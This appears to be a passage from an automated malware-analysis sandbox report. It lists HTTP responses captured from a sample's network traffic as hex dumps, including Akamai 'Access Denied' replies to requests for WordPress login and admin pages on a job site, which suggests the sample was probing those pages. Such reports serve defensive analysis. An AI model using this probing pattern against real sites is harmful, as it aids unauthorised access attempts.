00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTSet-Cookie: __cf_bm=C0okAsbog8HQOim82y8A0dtxa1TT2rXKEdpWRiS_Ncw-1707131692-1-AaCCF5wKz+RTseBMX6wyhxHWfFimdvblL3mBq8A5FlJsBiX/igET6K6Q9HB7wJj2EkwqNISYdZqVV4o65q1emC8=; path=/; expires=Mon, 05-Feb-24 11:44:52 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=NoneVary: Accept-EncodingServer: cloudflareCF-RAY: 850abb73aefb1357-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 38 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db 38 12 fe ee 5f 31 d5 2d 22 1b b0 64 a7 2f 97 5c 2c f9 d0 4d b3 b8 00 cd 6e 6f 9b 62 af 28 0a 83 22 c7 16 13 8a d4 92 b4 1d 6f ea ff 7e a0 28 d9 f2 4b b2 5b dc 01 01 62 92 c3 87 33 cf bc 90 a3 e4 c5 bb 5f 2e 6f 3f 7f b8 82 dc 16 62 dc 49 5e 44 d1 17 3e 05 61 e1 fa 0a ce be 8e 21 71 0b 40 05 31 26 0d a4 8a ee 0c 70 fc 3b 28 c1 38 06 20 88 9c a5 01 ca e8 d3 c7 60 0c c9 8b 2f 28 19 9f 7e 8d a2 2d 54 8d 03 70 1c ea ec fb a0 ce 9f 81 3a ff 0e a8 99 ad d1 dc c4 31 2b 0f 51 a2 68 17 29 47 c2 c6 9d c4 72 2b 70 fc d6 5a 94 96 2b 09 bf e2 ef 73 ae 91 bd 80 6f 70 29 d4 9c 4d 05 d1 98 0c bc 5c 27 29 d0 12 a0 39 d1 06 6d 1a 7c ba fd 29 3a 0f 60 d0 2c e4 d6 96 91 43 58 a4 c1 a5 92 0e 34 ba 5d 95 18 00 f5 a3 34 b0 f8 60 07 4e df d1 06 e6 39 94 ff 44 9f de 46 97 aa 28 89 e5 99 68 03 5d 5f a5 57 6c 86 ad 7d 92 14 98 06 5a 65 ca 9a 96 a0 54 5c 32 7c e8 83 54 53 25 84 5a 1e 6c 59 70 5c 96 4a db d6 a6 25 67 36 4f 19 2e 38 c5 a8 1a f4 b9 e4 96 13 11 19 4a 04 a6 a7 1e 45 70 79 0f 1a 45 1a 18 bb 12 68 72 44 1b 00 67 69 40 a7 13 3f 15 51 63 02 c8 35 4e d3 60 40 99 8c e8 8c 0f fc d2 80 4e 63 d4 5a 69 13 57 42 83 fd 18 fe c7 d7 f1 d3 47 84 db 23 38 ba 53 c2 3f 3d 85 63 73 d0 6e 34 54 82 e3 4c b1 d5 63 41 f4 8c cb 8b e1 a8 24 8c 71 39 bb 18 ae 13 0f 34 ee 74 5a 11 88 4e bf d3 61 1d 83 9d c4 50 cd 4b 3b ee 00 f0 29 74 5f 48 b2 e0 33 62 95 8e a9 52 f7 1c af 24 c9 04 b2 1e 3c 76 5c 0a 2c b9 64 6a 19 13 c6 ae 16 28 ed 7b 6e 2c 4a d4 dd f0 dd 2f 37 75 e4 bc 57 84 21 0b fb 30 9d 4b 5a 05 67 b7 d9 0d b0 20 1a 6a 60 01 29 30 45 e7 05 4a 1b cf d0 5e 09 74 3f 7f 5c 5d b3 6e e8 65 22 22 50 db b0 37 aa 77 37 3b e3 ca ae 98 71 53 0a b2 82 14 c2 4c 28 7a 1f 7a b9 75 af 03 b0 ee 24 83 c6 b4 83 2c ea 74 92 41 9d 48 8e 3b 67 7c c2 f8 a2 f6 7f b4 d4 a4 2c 51 07 e3 0a ae 5a a9 93 94 4e bd 4a d0 fc 88 2a 07 Data Ascii: 86dXmo8_1-"d/\,Mnob("o~(K[b3_.o?bI^D>a!q@1&p;(8 `/(~-Tp:1+Qh)Gr+pZ+sop)M\')9m|):`,CX4]4`N9DF(h]_Wl}ZeT\2|TS%ZlYp\J%g6O.8JEpyEhrDgi@?Qc5N`@NcZiWBG#8S?=csn4TLcA$q94tZNaPK;)t_
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 279Expires: Mon, 05 Feb 2024 11:14:52 GMTDate: Mon, 05 Feb 2024 11:14:52 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131692179_1611129006_213760295_11_8707_0_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 77 70 26 23 34 35 3b 6c 6f 67 69 6e 26 23 34 36 3b 70 68 70 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 32 26 23 34 36 3b 63 62 64 62 39 32 37 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;login&#46;php" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb927</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:14:07 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BhAGiaxVKVO%2FWM0P0dvf67Exyiv0%2Fsc%2BreFc2Rw9417O5wwrVWr8h6F%2BHuGVGAQcOTJjqUvh5ZtWLvjvOgY5xv0QnK6GitDB5vUDB9Rsq%2F1TqxsFxyoYFxbBHnBV3vVVdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb74fa3c12d3-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c 29 de 97 26 71 64 15 d7 dd 14 08 b0 c5 6d 6f b3 68 17 87 45 40 91 23 8b 17 8a d4 91 94 15 23 cd 7f 2f 28 4a b6 fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 c9 c7 9f 3f dc 7d fb 7c 03 85 2d 45 3a 4a 4e c2 f0 57 9e 83 b0 70 7b 03 17 df 53 48 dc 04 50 41 8c 59 04 52 85 bf 19 e0 f8 67 50 82 71 0c 40 10 b9 5c 04 28 c3 af 5f 82 14 92 93 5f 51 32 9e 7f 0f c3 2d 54 87 03 70 1c ea e2 c7 a0 2e 5f 81 ba fc 01 a8 a5 ed d0 dc 8b 63 59 1e a2 84 e1 2e 52 81 84 a5 a3 c4 72 2b 30 fd c9 5a 94 96 2b 09 bf e0 ef 35 d7 c8 4e e0 df f0 41 a8 9a e5 82 68 4c 62 6f 37 4a 4a b4 04 68 41 b4 41 bb 08 be de fd 2d bc 0c 20 ee 27 0a 6b ab d0 21 ac 16 c1 07 25 1d 68 78 b7 ae 30 00 ea 47 8b c0 e2 a3 8d 5d bc d7 1b 98 d7 50 fe 15 7e fd 29 fc a0 ca 8a 58 9e 89 21 d0 ed cd e2 86 2d 71 b0 4e 92 12 17 81 56 99 b2 66 60 28 15 97 0c 1f a7 20 55 ae 84 50 cd c1 92 15 c7 a6 52 da 0e 16 35 9c d9 62 c1 70 c5 29 86 ed 60 ca 25 b7 9c 88 d0 50 22 70 31 f3 28 82 cb 07 d0 28 16 81 b1 6b 81 a6 40 b4 01 70 b6 08 68 7e ef 5f 85 d4 98 00 0a 8d f9 22 88 29 93 21 5d f2 d8 4f c5 34 8f 50 6b a5 4d d4 1a c5 fb 1a be fa 9e be ec e2 6c eb 82 a3 f3 72 f6 87 5e 38 f6 8e 76 d5 d0 1a a6 99 62 eb a7 92 e8 25 97 f3 f3 eb 8a 30 c6 e5 72 7e fe 9c 78 a0 74 34 1a 28 10 5d 7c b3 f3 4e 83 a3 c4 50 cd 2b 9b 8e 00 78 0e e3 13 49 56 7c 49 ac d2 11 55 ea 81 e3 8d 24 99 40 36 81 a7 91 2b 81 86 4b a6 9a 88 30 76 b3 42 69 3f 71 63 51 a2 1e 9f 7d fc f9 ef 9d 72 3e 29 c2 90 9d 4d 21 af 25 6d c5 39 ee 57 03 ac 88 86 0e 58 c0 02 98 a2 75 89 d2 46 4b b4 37 02 dd e3 5f d7 b7 6c 7c e6 6d 42 22 50 Data Ascii: 6c8Xmo_1Q,)&qdmohE@##/(J\- 8|f3#?}|-E:JNWp{SHPAYRgPq@\(__Q2-Tp._cY.Rr+0Z+5NAhLbo7JJhAA- 'k!%hx0G]P~)X!-qNVf`( UPR5bp)`%P"p1((k@ph~_")!]O4PkMlr^8vb%0r~xt4(]|NP+xIV|IU$@6+K0vBi?qcQ}r>)M!%m9WXuFK7_l|mB"P
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 276Expires: Mon, 05 Feb 2024 11:14:52 GMTDate: Mon, 05 Feb 2024 11:14:52 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131692451_1611129006_213760407_15_10881_106_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 77 70 26 23 34 35 3b 61 64 6d 69 6e 26 23 34 37 3b 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 39 32 26 23 34 36 3b 63 62 64 62 39 39 37 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;wp&#45;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131692&#46;cbdb997</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rnHUskwPaTak3RTPHyRhhoWMf8E7rS6yw0kRm6829YQyRTYm9KQeQ1tmAj%2BNlN9t9rc0GLcTTzHs%2F%2BxjvvnYDNXPDSEbDAA1WvXswTBApw3%2FfZRwtHcUvinf6%2BszZf5QVw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb75da9112d3-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f e3 b8 11 fe ee 5f 31 51 81 c4 06 2c 29 de 97 26 71 64 15 d7 dd 14 08 b0 c5 6d 6f b3 68 17 87 45 40 91 23 8b 17 8a d4 91 94 15 23 cd 7f 2f 28 4a b6 fc 92 5c 17 2d 10 20 a2 38 7c 66 e6 e1 33 23 d2 c9 c9 c7 9f 3f dc 7d fb 7c 03 85 2d 45 3a 4a 4e c2 f0 57 9e 83 b0 70 7b 03 17 df 53 48 dc 04 50 41 8c 59 04 52 85 bf 19 e0 f8 67 50 82 71 0c 40 10 b9 5c 04 28 c3 af 5f 82 14 92 93 5f 51 32 9e 7f 0f c3 2d 54 87 03 70 1c ea e2 c7 a0 2e 5f 81 ba fc 01 a8 a5 ed d0 dc 8b 63 59 1e a2 84 e1 2e 52 81 84 a5 a3 c4 72 2b 30 fd c9 5a 94 96 2b 09 bf e0 ef 35 d7 c8 4e e0 df f0 41 a8 9a e5 82 68 4c 62 6f 37 4a 4a b4 04 68 41 b4 41 bb 08 be de fd 2d bc 0c 20 ee 27 0a 6b ab d0 21 ac 16 c1 07 25 1d 68 78 b7 ae 30 00 ea 47 8b c0 e2 a3 8d 5d bc d7 1b 98 d7 50 fe 15 7e fd 29 fc a0 ca 8a 58 9e 89 21 d0 ed cd e2 86 2d 71 b0 4e 92 12 17 81 56 99 b2 66 60 28 15 97 0c 1f a7 20 55 ae 84 50 cd c1 92 15 c7 a6 52 da 0e 16 35 9c d9 62 c1 70 c5 29 86 ed 60 ca 25 b7 9c 88 d0 50 22 70 31 f3 28 82 cb 07 d0 28 16 81 b1 6b 81 a6 40 b4 01 70 b6 08 68 7e ef 5f 85 d4 98 00 0a 8d f9 22 88 29 93 21 5d f2 d8 4f c5 34 8f 50 6b a5 4d d4 1a c5 fb 1a be fa 9e be ec e2 6c eb 82 a3 f3 72 f6 87 5e 38 f6 8e 76 d5 d0 1a a6 99 62 eb a7 92 e8 25 97 f3 f3 eb 8a 30 c6 e5 72 7e fe 9c 78 a0 74 34 1a 28 10 5d 7c b3 f3 4e 83 a3 c4 50 cd 2b 9b 8e 00 78 0e e3 13 49 56 7c 49 ac d2 11 55 ea 81 e3 8d 24 99 40 36 81 a7 91 2b 81 86 4b a6 9a 88 30 76 b3 42 69 3f 71 63 51 a2 1e 9f 7d fc f9 ef 9d 72 3e 29 c2 90 9d 4d 21 af 25 6d c5 39 ee 57 03 ac 88 86 0e 58 c0 02 98 a2 75 89 d2 46 4b b4 37 02 dd e3 5f d7 b7 6c 7c e6 6d 42 22 50 db b3 Data Ascii: 6c8Xmo_1Q,)&qdmohE@##/(J\- 8|f3#?}|-E:JNWp{SHPAYRgPq@\(__Q2-Tp._cY.Rr+0Z+5NAhLbo7JJhAA- 'k!%hx0G]P~)X!-qNVf`( UPR5bp)`%P"p1((k@ph~_")!]O4PkMlr^8vb%0r~xt4(]|NP+xIV|IU$@6+K0vBi?qcQ}r>)M!%m9WXuFK7_l|mB"P
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abb7598c8457b-ATLContent-Encoding: gzipData Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 fb fb 15 2b bd 2c 18 ca cd 15 f2 11 49 10 89 39 0a 4b 0c 6b 8e 04 39 e4 0e 8d ff de 00 8d ed cc 9b 97 a1 5d 72 89 d5 ad 4a e1 a4 ce 05 54 f5 b1 c8 63 f0 f6 88 79 aa 32 c4 44 25 5b 73 f0 03 c4 b4 f4 a4 20 ed 9e bd 24 cd 4d 2b 05 b9 ce f5 2c a3 20 82 d2 38 c8 cc 3c b4 84 5b 28 08 57 88 ee a6 fd 2e bb 50 fe 31 3a 94 82 46 a9 34 c3 c4 af 99 ad e3 16 ea 6b 01 9f c6 c2 60 1c 3c 16 0e cc 00 4e 77 16 2c 4f 6f 9e 7c c2 71 f1 ae 46 c2 f5 c9 0f 00 00 ff ff e3 02 00 f3 7c 15 3c c4 00 00 00 0d 0a Data Ascii: b3L=@D+,I9Kk9]rJTcy2D%[s $M+, 8<[(W.P1:F4k`<Nw,Oo|qF|<
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:14:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:15:07 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uHBJFymD2utvH5IoFxvviVDfMMjs%2BO4VuuRlw3LrJiumvQ2ulG0O4bVONnpEC%2FfkkNSfuaiOQJUaev7pEHWA%2BD30J%2F3hfn8884xXOGWzVNJAkGD8nazHUXMN7A4Dlkh5DQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abb77098ab129-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f db 38 12 fd df 9f 62 a2 03 12 1b 88 24 bb db 5e 12 5b d6 61 af cd 01 01 7a d8 de 36 c5 5d b1 28 02 8a 1c 59 dc 50 a4 96 a4 ac 18 d9 7c f7 05 45 c9 91 7f 24 7b c5 1d 10 20 a2 38 7c 33 f3 f8 66 44 3a 39 f9 f0 d3 fb db af 9f ae a1 b0 a5 48 47 c9 49 18 fe c2 73 10 16 6e ae e1 e2 5b 0a 89 9b 00 2a 88 31 cb 40 aa f0 57 03 1c ff 0a 4a 30 8e 01 08 22 57 cb 00 65 f8 e5 73 90 42 72 f2 0b 4a c6 f3 6f 61 f8 0c d5 e1 00 1c 87 ba f8 3e a8 cb 57 a0 2e bf 03 6a 65 3b 34 f7 e2 58 96 87 28 61 b8 8b 54 20 61 e9 28 b1 dc 0a 4c 7f b4 16 a5 e5 4a c2 cf f8 5b cd 35 b2 13 f8 1d de 0b 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 97 c1 97 db 7f 84 97 01 c4 fd 44 61 6d 15 3a 84 f5 32 78 af a4 03 0d 6f 37 15 06 40 fd 68 19 58 7c b0 b1 8b 77 b1 85 79 0d e5 3f e1 97 1f c3 f7 aa ac 88 e5 99 18 02 dd 5c 2f af d9 0a 07 eb 24 29 71 19 68 95 29 6b 06 86 52 71 c9 f0 e1 1c a4 ca 95 10 aa 39 58 b2 e6 d8 54 4a db c1 a2 86 33 5b 2c 19 ae 39 c5 b0 1d 9c 73 c9 2d 27 22 34 94 08 5c ce 3c 8a e0 f2 1e 34 8a 65 60 ec 46 a0 29 10 6d 00 9c 2d 03 9a df f9 57 21 35 26 80 42 63 be 0c 62 ca 64 48 57 3c f6 53 31 cd 23 d4 5a 69 13 b5 46 f1 be 86 af be a5 2f bb 38 7b 76 c1 d1 79 39 fb 53 2f 1c 7b 47 bb 6a 68 0d d3 4c b1 cd 63 49 f4 8a cb f9 74 51 11 c6 b8 5c cd a7 4f 89 07 4a 47 a3 81 02 d1 c5 37 9b 76 1a 1c 25 86 6a 5e d9 74 04 c0 73 18 9f 48 b2 e6 2b 62 95 8e a8 52 f7 1c af 25 c9 04 b2 09 3c 8e 5c 09 34 5c 32 d5 44 84 b1 eb 35 4a fb 91 1b 8b 12 f5 f8 ec c3 4f ff ec 94 f3 51 11 86 ec ec 1c f2 5a d2 56 9c e3 7e 35 c0 9a 68 e8 80 05 2c 81 29 5a 97 28 6d b4 42 7b 2d d0 3d fe 7d 73 c3 c6 67 de 26 24 02 b5 3d 9b 2c Data Ascii: 6c9Xo8b$^[az6](YP|E${ 8|3fD:9HGIsn[*1@WJ0"WesBrJoa>W.je;4X(aT 